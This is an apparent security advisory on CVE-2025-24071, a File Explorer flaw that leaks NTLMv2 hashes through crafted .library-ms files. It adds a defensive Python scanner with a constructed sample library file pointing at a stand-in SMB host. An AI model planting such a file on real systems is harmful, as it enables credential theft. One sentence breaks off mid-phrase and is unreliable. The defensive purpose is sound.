Microsoft has disclosed a critical vulnerability in Windows File Explorer, CVE-2025-24071, with a CVSS score of 7.5. It allows attackers to obtain a victim's NTLM hash, which can then be used for further attacks such as pass-the-hash or offline cracking. Microsoft has since fixed the vulnerability.
CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Overview
Cybersecurity agencies have published information about the CVE-2025-24071 vulnerability. This is a critical vulnerability in Windows File Explorer, with a CVSS score of 7.5. It affects multiple versions of Windows, including Windows 10, Windows 11, and various Windows Server versions. The vulnerability arises from Windows Explorer's implicit trust in, and automatic parsing of, .library-ms files: XML-based files that define search or library locations within the operating system.

The core issue is that when a .library-ms file crafted with a malicious SMB (Server Message Block) path is embedded in a RAR or ZIP archive and subsequently extracted, Windows Explorer automatically processes it for indexing, previews, or thumbnails.
This processing triggers an SMB authentication request to the attacker-controlled server, which discloses the user's NTLMv2 hash. That hash can then be used for attacks such as pass-the-hash or offline NTLM hash cracking, posing a significant security risk.
Technical Details
The PoC for CVE-2025-24071 has been released for educational purposes only and is publicly available on GitHub in an eponymous repository created by a malware and CTI analyst known as 0x6rss. The PoC is implemented as a Python script that demonstrates the exploitation process. It involves creating a specially crafted .library-ms file that includes a

Upon extraction of the archive, Windows Explorer automatically begins processing the .library-ms file. This can be observed with tools such as Process Monitor (Procmon), where processes including Explorer.exe and SearchProtocolHost.exe perform operations such as CreateFile, ReadFile, QueryBasicInformationFile, and CloseFile for indexing purposes.
The automatic processing triggers an SMB authentication handshake, which can be captured in Wireshark with an SMB display filter (smb or smb2). The capture shows an SMB2 Negotiate Protocol Request from the victim to the attacker's server, followed by an SMB2 Session Setup Request (NTLMSSP_AUTH) that leaks the victim's NTLMv2 hash. The key feature of this vulnerability is that no user interaction is required beyond extracting the archive, which makes it a zero-click exploit in certain scenarios.
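Because the trigger is a library location that points at a remote SMB host, a defender can check .library-ms files inside an archive for such locations before the archive is extracted (for example in a mail gateway or sandbox). The following scanner is an added example, not code from the original page or from the PoC repository; it assumes the .library-ms format is plain XML in which the <url> element carries the location, and it treats any host other than the local machine as suspicious. The sample library file and its 203.0.113.10 address are constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
# Hosts a library location may point at without causing an outbound SMB authentication.
# Assumption of this example: any other host in a UNC path or smb:// / file:// URL is reported.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Captures the host part of \\host\share, //host/share, smb://host/... or file://host/...
UNC_RE = re.compile(r"^(?:\\\\|//|smb://|file://)(?P<host>[^\\/]+)", re.IGNORECASE)

def remote_hosts_in_library(xml_bytes: bytes) -> list:
    """(url, host) for each <url> element naming a remote host; matched on local name,
    so it works with or without the library namespace the format normally declares."""
    hits = []
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return hits  # not well-formed XML: nothing Explorer could resolve as a library
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1].lower() != "url" or not elem.text:
            continue
        url = elem.text.strip()
        m = UNC_RE.match(url)
        if m and m.group("host").lower() not in LOCAL_HOSTS:
            hits.append((url, m.group("host")))
    return hits

def scan_zip(zip_bytes: bytes) -> list:
    """Inspect every .library-ms member of a ZIP in memory, before anything is extracted."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".library-ms"):
                for url, host in remote_hosts_in_library(zf.read(name)):
                    findings.append({"member": name, "url": url, "host": host})
    return findings

# Constructed sample: a library whose only location is a UNC path to a documentation
# address (203.0.113.10), packed into a ZIP in memory so the scan runs offline.
SAMPLE_LIBRARY = b"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription>
    <simpleLocation><url>\\\\203.0.113.10\\share</url></simpleLocation>
  </searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>"""

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.library-ms", SAMPLE_LIBRARY)
    return buf.getvalue()
```

The same check applied to RAR archives needs a third-party reader, since the standard library only handles ZIP; the XML inspection itself is unchanged.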
Exploitation in the Wild and Microsoft Response
Research suggests that CVE-2025-24071 is not merely theoretical but is actively exploited in the wild. In the aforementioned blog, the author reports that the vulnerability may have been sold on a forum by a threat actor named "Krypt0n," known for developing EncryptHub Stealer. An X post further corroborates this, describing how the exploit is configured on a server the attacker controls (e.g., a VPS) with the attacker's IP address and share, so that hash leaks are triggered as soon as Explorer processes the file, without the file being opened.
Microsoft addressed this vulnerability in the March 2025 Patch Tuesday update, released earlier this month. The patch details are referenced in the Microsoft Security Update Guide. Users of vulnerable systems are advised to update to a patched version of the OS.